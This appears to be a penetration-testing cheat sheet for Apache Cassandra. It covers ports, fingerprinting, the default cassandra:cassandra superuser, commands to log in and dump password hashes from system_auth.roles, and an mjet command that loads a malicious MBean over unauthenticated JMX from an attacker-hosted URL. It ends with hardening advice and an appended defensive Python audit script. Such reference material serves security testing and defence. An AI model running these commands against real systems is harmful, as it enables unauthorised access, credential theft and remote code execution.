Cassandra
aka cql
Distributed NoSQL database — CQL on 9042, JMX on 7199. Default cassandra:cassandra creds are common; the JMX port often allows unauthenticated MBean loading for RCE.
Ports
| Port | Proto | Notes |
|---|---|---|
| 9042 | tcp | CQL native protocol |
| 7199 | tcp | JMX (management → RCE) |
| 9160 | tcp | legacy Thrift |
Fingerprint
- nmap cassandra-info returns cluster name + version
- cqlsh connects on 9042
Default / weak creds
cassandra / cassandra (default superuser)
Exploitation primitives
- Default cassandra:cassandra → cqlsh, read every keyspace/table (app creds live here)
- List users and password hashes from system_auth.roles
- Unauthenticated JMX on 7199 → load a malicious MBean for RCE (mjet / jmxploit)
Overview
Cassandra speaks CQL on 9042 and exposes JMX on 7199. The quick wins are default creds into the data, and an open JMX port for code execution.
Enumeration
Version / cluster info:
nmap -p9042 --script cassandra-info <TARGET>
Connect with default creds:
cqlsh <TARGET> 9042 -u cassandra -p cassandra
List keyspaces, then dump a table:
DESC KEYSPACES;
SELECT * FROM system_auth.roles;
JMX → RCE (7199)
If JMX has no auth, load a malicious MBean:
java -jar mjet.jar <TARGET> 7199 install jmxrmi http://<YOUR_IP>:8000 8000
Hardening
Change the default superuser, require authentication, and lock JMX behind auth + TLS.
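A check for the three hardening items above, written as an added example (not part of the original page or of the Cassandra project). It inspects the contents of cassandra.yaml, the Cassandra JVM's command line, and rows read from system_auth.roles. The function names, finding labels and sample inputs are constructed for illustration, and the yaml check assumes the scalar `authenticator:` / `authorizer:` form.

```python
import re

# Constructed sample inputs (not taken from a real host).
SAMPLE_YAML = """\
cluster_name: 'Test Cluster'
authenticator: AllowAllAuthenticator
# authorizer: CassandraAuthorizer
native_transport_port: 9042
"""
SAMPLE_JVM_ARGS = ("java -Dcassandra.jmx.remote.port=7199 "
                   "-Dcom.sun.management.jmxremote.authenticate=false "
                   "-Dcom.sun.management.jmxremote.ssl=false")
# Rows as (role, is_superuser, can_login) read from system_auth.roles.
SAMPLE_ROLES = [("cassandra", True, True), ("app_rw", False, True)]

def yaml_value(text, key, default):
    """Top-level scalar for `key`; commented-out or missing keys give `default`."""
    m = re.search(rf"^{re.escape(key)}:[ \t]*([^#\n]+)", text, re.M)
    return m.group(1).strip().strip("'\"") if m else default

def jvm_props(cmdline):
    """Collect -Dkey=value system properties; a later flag overrides an earlier one."""
    return dict(re.findall(r"-D([\w.]+)=(\S+)", cmdline))

def audit(yaml_text, jvm_cmdline, roles):
    findings = []
    # Cassandra falls back to the AllowAll* classes when these keys are unset.
    if yaml_value(yaml_text, "authenticator", "AllowAllAuthenticator") == "AllowAllAuthenticator":
        findings.append("cql-no-authentication")
    if yaml_value(yaml_text, "authorizer", "AllowAllAuthorizer") == "AllowAllAuthorizer":
        findings.append("cql-no-authorization")
    props = jvm_props(jvm_cmdline)
    # A remote JMX port means 7199 is reachable from beyond localhost.
    if props.keys() & {"cassandra.jmx.remote.port", "com.sun.management.jmxremote.port"}:
        # Anything other than an explicit "true" is reported (conservative).
        if props.get("com.sun.management.jmxremote.authenticate") != "true":
            findings.append("jmx-remote-no-auth")
        if props.get("com.sun.management.jmxremote.ssl") != "true":
            findings.append("jmx-remote-no-tls")
    # The stock "cassandra" role should not remain a usable superuser.
    if any(r == "cassandra" and su and login for r, su, login in roles):
        findings.append("default-superuser-active")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_YAML, SAMPLE_JVM_ARGS, SAMPLE_ROLES):
        print("FINDING:", finding)
```

The role check only shows that the stock `cassandra` superuser is still able to log in; whether its password was changed has to be verified separately.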